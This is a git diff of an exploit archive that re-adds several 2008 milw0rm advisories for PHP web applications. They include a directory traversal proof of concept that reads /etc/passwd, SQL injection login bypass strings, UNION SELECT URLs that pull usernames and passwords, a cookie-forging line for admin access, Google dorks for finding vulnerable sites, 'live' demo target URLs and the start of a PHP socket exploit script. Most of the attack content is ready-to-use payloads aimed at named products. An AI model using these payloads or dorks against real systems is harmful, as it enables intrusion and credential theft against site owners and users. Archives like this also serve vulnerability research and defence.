+#										 #		
+#		Author:	Vinod Sharma						 #
+#		Email:	vinodsharma.mimit@gmail.com				 #
+#		Date:	05th Nov, 2008						 #
+#		Note: 	This information is only for educational purpose, author # 
+#			will not bear responsibility for any damages. 		 #
+##################################################################################
+
+
+#########################################################################################
+#Directory traversal vulnerability in MySQL Quick Admin 1.5.5 				#
+#allows remote attackers to read and execute arbitrary files via a .. (dot dot) 	#
+#in the lang parameter to actions.php.							#
+#											#
+#											#
+#											#
+#Appplication still unpatched								#
+#											#
+#vulnerable code in actions.php								#
+# 											#				
+#/* code start										#
+#    case 27:										#
+#         $do = $_GET['do'];								#
+#         if($do == "theme" && file_exists("themes/".$_GET['theme'])){			#
+#             setcookie('theme', $_GET['theme'], time()+60*60*24*30);			#
+#             $_SESSION['theme'] = $_GET['theme'];					#
+#             unset($_SESSION['theme_name']);						#
+#         } else if($do == "lang" && file_exists("lang/".$_GET['lang'])){		#
+#             setcookie('language', $_GET['lang'], time()+60*60*24*30);			#
+#             $_SESSION['language'] = $_GET['lang'];					#
+#             unset($_SESSION['lang_name']);						#
+#         }										#
+#         header("Location: main.php");							#
+#											#
+#/* code end										#
+#											#	
+#$_SESSION['language'] is set to the value of the lang parameter without any 		#
+#sanitization.										#
+#											#
+#The actions.php will send this $_SESSION['language'] value to required.php which will 	#
+#pass it to include() function without any sanitization. 				#
+#											#
+#											#
+#vulnerable code in required.php							#
+#											#
+#/* code start 										#
+#											#
+#line 22 in required.php:  include("lang/".$_SESSION['language']."/lang.php");		#			
+#											#
+#/* code end										#
+#########################################################################################
+
+
+POC:http://www.example.com/quickadmin/actions.php?act=27&do=lang&lang=../../../../../../../../../../etc/passwd%00
+
+
+#########################################################################################
+#	references:									#
+#	http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4454			#
+#	http://secunia.com/advisories/31820						#
+#########################################################################################
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7021.txt b/platforms/php/webapps/7021.txt
index 55c9ffbfc..78431f43a 100755
--- a/platforms/php/webapps/7021.txt
+++ b/platforms/php/webapps/7021.txt
@@ -1,65 +1,65 @@
-*********************************************************************************************        
-[!]                                                                                       [!]
-[!] OOOO             O                                 OOOOOOOOO                          [!]
-[!]O    O            O                                 O      O                           [!]
-[!]O                 O                                       O                            [!]
-[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
-[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
-[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
-[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
-[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
-[!]          OO                                                                           [!]
-[!]         OO                                                                            [!]
-[!]        OO                          Proud To Be MoroCCaN                               [!]
-[!]       OO                                                                              [!]
-*********************************************************************************************
-Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
----------------------------------------------------------------------------------------------
-=      Softcomplex PHP Image Gallery v1.0 (Auth Bypass) SQL Injection Vulnerability         =
----------------------------------------------------------------------------------------------
-
----------------------------------------------------------------------------------------------
--===========================================================================================-
--=                  Discovred By : Cyber-Zone                                              =-
--=                                                                                         =-
--=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
--=                                                                                         =-
--=                  Home : WwW.IQ-Ty.CoM                                                   =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-
-Download : http://www.softcomplex.com/products/php_image_gallery/
-
-Dork In GooGle :  Powered by PHP Image Gallery
-
-Bypass :
-
-Go To Admin Panel :
-
-Login With this information :
-
-Admin : admin ' or ' 1=1
-pass  : Cyber-Zone or any thing
-
-Loged in :)
-
-Live demo :
-
-http://www.softcomplex.com/products/php_image_gallery/demo/index.php?action=login
-
-EnjoY
-
-
-
----------------------------------------------------------------------------------------------
--======================================= ThanX To ==========================================-
--=                 Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord         =-
--=                                                                                         =-
--=                           StaCk , The_5pectrum , (JIKO) No-Exploit                      =-
--=                                                                                         =-
--=                                    Oujda SeCurity TeaM                                  =-
--===========================================================================================-
----------------------------------------------------------------------------------------------
-AttaCk Is CompLeT :)
-
-# milw0rm.com [2008-11-06]
+*********************************************************************************************        
+[!]                                                                                       [!]
+[!] OOOO             O                                 OOOOOOOOO                          [!]
+[!]O    O            O                                 O      O                           [!]
+[!]O                 O                                       O                            [!]
+[!]O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO  [!]
+[!]O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O [!]
+[!]O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO [!]
+[!]O    O    OOOO    O     O   O         O               O      O O    O   O   O   O      [!]
+[!] OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO  [!]
+[!]          OO                                                                           [!]
+[!]         OO                                                                            [!]
+[!]        OO                          Proud To Be MoroCCaN                               [!]
+[!]       OO                                                                              [!]
+*********************************************************************************************
+Maghribi WnaftakhaR , Wali Ma3ajboCh YantahaR , OyaktaB 3la 9abro , Ana MayeT Men Al9aheR
+---------------------------------------------------------------------------------------------
+=      Softcomplex PHP Image Gallery v1.0 (Auth Bypass) SQL Injection Vulnerability         =
+---------------------------------------------------------------------------------------------
+
+---------------------------------------------------------------------------------------------
+-===========================================================================================-
+-=                  Discovred By : Cyber-Zone                                              =-
+-=                                                                                         =-
+-=                  E-mail : paradis_des_fous@hotmail.fr                                   =-
+-=                                                                                         =-
+-=                  Home : WwW.IQ-Ty.CoM                                                   =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+
+Download : http://www.softcomplex.com/products/php_image_gallery/
+
+Dork In GooGle :  Powered by PHP Image Gallery
+
+Bypass :
+
+Go To Admin Panel :
+
+Login With this information :
+
+Admin : admin ' or ' 1=1
+pass  : Cyber-Zone or any thing
+
+Loged in :)
+
+Live demo :
+
+http://www.softcomplex.com/products/php_image_gallery/demo/index.php?action=login
+
+EnjoY
+
+
+
+---------------------------------------------------------------------------------------------
+-======================================= ThanX To ==========================================-
+-=                 Hussin X , HayBay , HiChaM , WaLid , GeneraL-Oujda , Oujda-Lord         =-
+-=                                                                                         =-
+-=                           StaCk , The_5pectrum , (JIKO) No-Exploit                      =-
+-=                                                                                         =-
+-=                                    Oujda SeCurity TeaM                                  =-
+-===========================================================================================-
+---------------------------------------------------------------------------------------------
+AttaCk Is CompLeT :)
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7025.txt b/platforms/php/webapps/7025.txt
index 6816536c6..3276d0c06 100755
--- a/platforms/php/webapps/7025.txt
+++ b/platforms/php/webapps/7025.txt
@@ -1,46 +1,46 @@
-[~] deltascripts phpShop Remote Auth Bypass Vulnerability
-[~]
-[~] ----------------------------------------------------------
-[~] Discovered By: ZoRLu
-[~]
-[~] Date: 06.11.2008
-[~]
-[~] Home: www.z0rlu.blogspot.com
-[~]
-[~] contact: trt-turk@hotmail.com
-[~]
-[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
-[~]
-[~] dork: "Powered by PHP Shop from DeltaScripts"
-[~]
-[~] -----------------------------------------------------------
-
-Exploit:
-
-username: [real_admin_name] ' or ' 1=1
-
-password: ZoRLu
-
-note: generally admin name: admin 
-
-
-admin login for demo:
-
-http://demo.deltascripts.com/phpshop/admin/login.php
-
-
-example for demo:
-
-admin: admin ' or ' 1=1
-
-passwd: ZoRLu
-
-
-[~]----------------------------------------------------------------------
-[~] Greetz tO: str0ke & all Muslim HaCkeRs
-[~]
-[~] yildirimordulari.org  &  darkc0de.com
-[~]
-[~]----------------------------------------------------------------------
-
-# milw0rm.com [2008-11-06]
+[~] deltascripts phpShop Remote Auth Bypass Vulnerability
+[~]
+[~] ----------------------------------------------------------
+[~] Discovered By: ZoRLu
+[~]
+[~] Date: 06.11.2008
+[~]
+[~] Home: www.z0rlu.blogspot.com
+[~]
+[~] contact: trt-turk@hotmail.com
+[~]
+[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( (
+[~]
+[~] dork: "Powered by PHP Shop from DeltaScripts"
+[~]
+[~] -----------------------------------------------------------
+
+Exploit:
+
+username: [real_admin_name] ' or ' 1=1
+
+password: ZoRLu
+
+note: generally admin name: admin 
+
+
+admin login for demo:
+
+http://demo.deltascripts.com/phpshop/admin/login.php
+
+
+example for demo:
+
+admin: admin ' or ' 1=1
+
+passwd: ZoRLu
+
+
+[~]----------------------------------------------------------------------
+[~] Greetz tO: str0ke & all Muslim HaCkeRs
+[~]
+[~] yildirimordulari.org  &  darkc0de.com
+[~]
+[~]----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7026.txt b/platforms/php/webapps/7026.txt
index a83ae72fc..3d9ba88e3 100755
--- a/platforms/php/webapps/7026.txt
+++ b/platforms/php/webapps/7026.txt
@@ -1,35 +1,35 @@
-SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
-___________________________________
-
-Author:  Hussin X
-
-Home :  www.IQ-TY.com  & www.TrYaG.cc
-
-MaiL :   darkangeL_G85@Yahoo.CoM
-___________________________________
-
-script    : http://www.softcomplex.com/products/php_image_gallery/demo2/
-
-_____
-
-ExploiT & demo
-_____________
-
-http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaGi
-
-# milw0rm.com [2008-11-06]
+SoftComplex PHP Image Gallery ( ctg ) Remote SQL Injection Velnerability
+___________________________________
+
+Author:  Hussin X
+
+Home :  www.IQ-TY.com  & www.TrYaG.cc
+
+MaiL :   darkangeL_G85@Yahoo.CoM
+___________________________________
+
+script    : http://www.softcomplex.com/products/php_image_gallery/demo2/
+
+_____
+
+ExploiT & demo
+_____________
+
+http://www.softcomplex.com/products/php_image_gallery/demo2/index.php?ctg=39 and 1=0 UNioN seLecT 1,2,concat(login,0x3e,password),4,5,6,7,8+FROM+user&action=show
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|   All members of the Forum| WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|   Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab | G4N0K
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaGi
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7027.txt b/platforms/php/webapps/7027.txt
index b08763122..570bf0ad7 100755
--- a/platforms/php/webapps/7027.txt
+++ b/platforms/php/webapps/7027.txt
@@ -1,62 +1,62 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	Software Directory v1.0 (SQL/XSS) Remote SQL Vulnerability
-==============================================================================
-
-	[»] Script:             [ Software Directory v1.0 ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.turnkeyforms.com/software-directory.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 06.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-
-	[ SQLi ]
-	[»] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--
-
-
-	[ XSS ]
-	[»] http://localhost/[path]/signinform.php?msg=">
-
-
-
-
-===[ LIVE ]===
-	
-	[ SQLi ]
-	[»] http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--
-
-	[ XSS ]
-	[»] http://demo.turnkeyforms.com/software-directory/signinform.php?msg=">
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit(); //EoX
-===============================================================================
-
-# milw0rm.com [2008-11-06]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	Software Directory v1.0 (SQL/XSS) Remote SQL Vulnerability
+==============================================================================
+
+	[»] Script:             [ Software Directory v1.0 ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.turnkeyforms.com/software-directory.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 06.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+
+	[ SQLi ]
+	[»] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--
+
+
+	[ XSS ]
+	[»] http://localhost/[path]/signinform.php?msg=">
+
+
+
+
+===[ LIVE ]===
+	
+	[ SQLi ]
+	[»] http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--
+
+	[ XSS ]
+	[»] http://demo.turnkeyforms.com/software-directory/signinform.php?msg=">
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit(); //EoX
+===============================================================================
+
+# milw0rm.com [2008-11-06]
diff --git a/platforms/php/webapps/7028.txt b/platforms/php/webapps/7028.txt
index a93bdea98..d53e0ec8c 100755
--- a/platforms/php/webapps/7028.txt
+++ b/platforms/php/webapps/7028.txt
@@ -1,56 +1,56 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	 Entertainment Portal v2.0 Insecure Cookie Handling Vulnerability
-==============================================================================
-
-	[»] Script:             [ Entertainment Portal v2.0 ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.turnkeyforms.com/entertainment-portal.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 06.11.2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-
-	 Admin-Panel:	http://localhost/[path]/admin/
-	
-	[»] javascript:document.cookie = "adminLogged=Administrator";
-
-
-
-===[ LIVE ]===
-
-	[»] http://mediacms.demo.turnkeyforms.com/admin/
-
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit(); //EoX
-===============================================================================
-
-# milw0rm.com [2008-11-07]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	 Entertainment Portal v2.0 Insecure Cookie Handling Vulnerability
+==============================================================================
+
+	[»] Script:             [ Entertainment Portal v2.0 ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.turnkeyforms.com/entertainment-portal.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 06.11.2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+
+	 Admin-Panel:	http://localhost/[path]/admin/
+	
+	[»] javascript:document.cookie = "adminLogged=Administrator";
+
+
+
+===[ LIVE ]===
+
+	[»] http://mediacms.demo.turnkeyforms.com/admin/
+
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit(); //EoX
+===============================================================================
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7029.txt b/platforms/php/webapps/7029.txt
index 732cdca7e..5924bca18 100755
--- a/platforms/php/webapps/7029.txt
+++ b/platforms/php/webapps/7029.txt
@@ -1,53 +1,53 @@
-==============================================================================
-                      _      _       _          _      _   _ 
-                     / \    | |     | |        / \    | | | |
-                    / _ \   | |     | |       / _ \   | |_| |
-                   / ___ \  | |___  | |___   / ___ \  |  _  |
-   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
-                                                             
-
-==============================================================================
-                      ____   _  _     _   _    ___    _  __
-                     / ___| | || |   | \ | |  / _ \  | |/ /
-                    | |  _  | || |_  |  \| | | | | | | ' / 
-                    | |_| | |__   _| | |\  | | |_| | | . \ 
-                     \____|    |_|   |_| \_|  \___/  |_|\_\
-
-==============================================================================
-	Business Survey Pro 1.0 (survey_results_text.php id) Remote SQL Vulnerability
-==============================================================================
-
-	[»] Script:             [ Business Survey Pro 1.0 ]
-	[»] Language:           [ PHP ]
-	[»] Website:            [ http://www.turnkeyforms.com/business-survey-pro.html ]
-	[»] Type:               [ Commercial ]
-	[»] Report-Date:        [ 06/11/2008 ]
-	[»] Founder:            [ G4N0K  ]
-
-
-===[ XPL ]===
-
-	[»] http://localhost/[path]/survey_results_text.php?id=-6/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5--
-
-
-===[ LIVE ]===
-
-	[»] http://business-survey-pro.demo.turnkeyforms.com/survey_results_text.php?id=-6/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5--
-
-
-
-	
-===[ Greetz ]===
-
-	[»] ALLAH
-	[»] Tornado2800 
-	[»] Hussain-X 
-
-	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
-	//ALLAH,forgimme...
-
-===============================================================================
-exit(); //EoX
-===============================================================================
-
-# milw0rm.com [2008-11-07]
+==============================================================================
+                      _      _       _          _      _   _ 
+                     / \    | |     | |        / \    | | | |
+                    / _ \   | |     | |       / _ \   | |_| |
+                   / ___ \  | |___  | |___   / ___ \  |  _  |
+   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
+                                                             
+
+==============================================================================
+                      ____   _  _     _   _    ___    _  __
+                     / ___| | || |   | \ | |  / _ \  | |/ /
+                    | |  _  | || |_  |  \| | | | | | | ' / 
+                    | |_| | |__   _| | |\  | | |_| | | . \ 
+                     \____|    |_|   |_| \_|  \___/  |_|\_\
+
+==============================================================================
+	Business Survey Pro 1.0 (survey_results_text.php id) Remote SQL Vulnerability
+==============================================================================
+
+	[»] Script:             [ Business Survey Pro 1.0 ]
+	[»] Language:           [ PHP ]
+	[»] Website:            [ http://www.turnkeyforms.com/business-survey-pro.html ]
+	[»] Type:               [ Commercial ]
+	[»] Report-Date:        [ 06/11/2008 ]
+	[»] Founder:            [ G4N0K  ]
+
+
+===[ XPL ]===
+
+	[»] http://localhost/[path]/survey_results_text.php?id=-6/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5--
+
+
+===[ LIVE ]===
+
+	[»] http://business-survey-pro.demo.turnkeyforms.com/survey_results_text.php?id=-6/**/UNION/**/ALL/**/SELECT/**/1,2,concat(user(),0x3a,version()),4,5--
+
+
+
+	
+===[ Greetz ]===
+
+	[»] ALLAH
+	[»] Tornado2800 
+	[»] Hussain-X 
+
+	//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)
+	//ALLAH,forgimme...
+
+===============================================================================
+exit(); //EoX
+===============================================================================
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7030.txt b/platforms/php/webapps/7030.txt
index d225a5692..f6c041fed 100755
--- a/platforms/php/webapps/7030.txt
+++ b/platforms/php/webapps/7030.txt
@@ -1,59 +1,58 @@
-
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by  :  Cyb3r-1sT
-
-<> C0ntact : cyb3r-1st [at] hotmail.com 
-                   
-<> Groups : InjEctOr5 T3am 
-
-<> site : www.tryag.cc/cc
-
-=======================================================
-+++++++++++++++++++ Script information+++++++++++++++++
-=======================================================
-
-
-<<->> script      : Mole Group Pizza Script
-
-<<->> script demo : www.mole-group.com/content/view/38/51/               
-
-
-
-=======================================================
-+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : find it
-
-<<->> Exploit :>>>
-
-          >>>> www.site.me/index.php?manufacturers_id=-1+union+select+user()--&osCsid=0d4d9ec8a0cf2aba5f633bb4691aea2c
-	       http://xxxxxxx/index.php?manufacturers_id=-1+union+select+convert(user()+using+latin1)/*
-          
-
-=======================================================
-++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
-=======================================================
-
-
-<<->> All freinds and all muslims
-
-
-# milw0rm.com [2008-11-07]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by  :  Cyb3r-1sT
+
+<> C0ntact : cyb3r-1st [at] hotmail.com 
+                   
+<> Groups : InjEctOr5 T3am 
+
+<> site : www.tryag.cc/cc
+
+=======================================================
++++++++++++++++++++ Script information+++++++++++++++++
+=======================================================
+
+
+<<->> script      : Mole Group Pizza Script
+
+<<->> script demo : www.mole-group.com/content/view/38/51/               
+
+
+
+=======================================================
++++++++++++++++++++++++ Exploit +++++++++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : find it
+
+<<->> Exploit :>>>
+
+          >>>> www.site.me/index.php?manufacturers_id=-1+union+select+user()--&osCsid=0d4d9ec8a0cf2aba5f633bb4691aea2c
+	       http://xxxxxxx/index.php?manufacturers_id=-1+union+select+convert(user()+using+latin1)/*
+          
+
+=======================================================
+++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
+=======================================================
+
+
+<<->> All freinds and all muslims
+
+
+# milw0rm.com [2008-11-07]
diff --git a/platforms/php/webapps/7031.php b/platforms/php/webapps/7031.php
index 3092e893e..bd143cd85 100755
--- a/platforms/php/webapps/7031.php
+++ b/platforms/php/webapps/7031.php
@@ -1,231 +1,231 @@
-starting();
-$exploit->is_vulnerable($domain);
-$exploit->exploiting($domain,$mymode);
-
- 
-
-class Exploit
-{
-  function http_request($host,$data) 
-  {   
-   
-    if(!$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP)) 
-    {
-       echo "socket_create() error!\r\n";
-       exit;
-    }
-    if(!socket_set_option($socket,SOL_SOCKET,SO_BROADCAST,1))
-    { 
-      echo "socket_set_option() error!\r\n";
-      exit;
-    }
-    
-    if(!socket_connect($socket,$host,80))
-    {
-      echo "socket_connect() error!\r\n";
-      exit;
-    }
-    if(!socket_write($socket,$data,strlen($data)))
-    {
-      echo "socket_write() errror!\r\n";
-      exit;
-    }
-  
-    while($get = socket_read($socket,1024,PHP_NORMAL_READ)) 
-    { 
-      $content .= $get; 
-    }
-
-    socket_close($socket);
-  
-    $array = array(
-                 'HTTP/1.1 404 Not Found',
-                 'HTTP/1.1 300 Multiple Choices',
-                 'HTTP/1.1 301 Moved Permanently',
-                 'HTTP/1.1 302 Found',
-                 'HTTP/1.1 304 Not Modified',
-                 'HTTP/1.1 400 Bad Request',
-                 'HTTP/1.1 401 Unauthorized',
-                 'HTTP/1.1 402 Payment Required',
-                 'HTTP/1.1 403 Forbidden',
-                 'HTTP/1.1 405 Method Not Allowed',
-                 'HTTP/1.1 406 Not Acceptable',
-                 'HTTP/1.1 407 Proxy Authentication Required',
-                 'HTTP/1.1 408 Request Timeout',
-                 'HTTP/1.1 409 Conflict',
-                 'HTTP/1.1 410 Gone',
-                 'HTTP/1.1 411 Length Required',
-                 'HTTP/1.1 412 Precondition Failed',
-                 'HTTP/1.1 413 Request Entity Too Large',
-                 'HTTP/1.1 414 Request-URI Too Long',
-                 'HTTP/1.1 415 Unsupported Media Type',
-                 'HTTP/1.1 416 Request Range Not Satisfiable',
-                 'HTTP/1.1 417 Expectation Failed',
-                 'HTTP/1.1 Retry With',
-                );
-               
-    for($i=0;$i<=count($array);$i++)
-   
-    if(eregi($array[$i],$content)) 
-    {
-      return ("$array[$i]\r\n");
-      break;
-    } 
-    else 
-    {
-      return ("$content\r\n");
-      break;
-    }
-  }
-  
-  function is_vulnerable($host)
-  {
-    $host = explode('/',$host);
-    
-    $header .= "GET /$host[1]/modules/3rdparty/adminpart/add3rdparty.php?module=%27 HTTP/1.1\r\n";
-    $header .= "Host: $host[0]\r\n";
-    $header .= "User-Agent: athos~doesntexist\r\n";
-    $header .= "Connection: close\r\n\r\n";
-    
-    if(stristr($this->http_request($host[0],$header),"\\'"))
-    {  
-      echo "[+] Magic Quotes GPC On!\n";
-      echo "[+] Exploit Failed!\n";
-      exit;
-    }
-    else
-    {
-      return false;
-    }
-  }
-  
-  function starting()
-  {
-    global $argv;
-    
